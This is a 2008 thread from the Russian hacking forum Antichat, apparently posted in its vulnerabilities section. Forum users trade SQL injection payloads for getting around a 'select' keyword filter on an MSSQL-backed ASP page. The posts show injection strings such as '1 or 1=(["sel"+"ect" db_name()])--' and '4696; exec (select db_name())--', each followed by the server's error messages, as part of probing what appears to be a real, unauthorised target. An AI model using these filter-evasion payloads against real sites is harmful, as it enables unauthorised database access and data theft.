фильтрация select в mssql

FORUMS

MEMBERS

RECENT POSTS

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
фильтрация select в mssql

04.07.2008, 12:24

durito

Познающий

Регистрация: 06.06.2008

Сообщений: 76

С нами: 9436363

Репутация: 55

так ведь, дык не вырезается а заменяет на ё

Dima-k17

отвечает:

Цитата:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near 'ect'.

/event_detail.asp, line 44

обрамляем скобками и видим что не нравится:

Цитата:

1 or 1=(["sel"+"ect" db_name()])--

Цитата:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Invalid column name '"sel" "ect" db_name()'.

/event_detail.asp, line 44

т.е. при таком запросе просто отбрасывает sel

если пробовать так:

Цитата:

4696; exec (select db_name())--

то ответ:

Цитата:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near 'ex'.

/event_detail.asp, line 44

подставляем скобки:

Цитата:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near 'exëc (selëct db_name())'.

/event_detail.asp, line 44

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home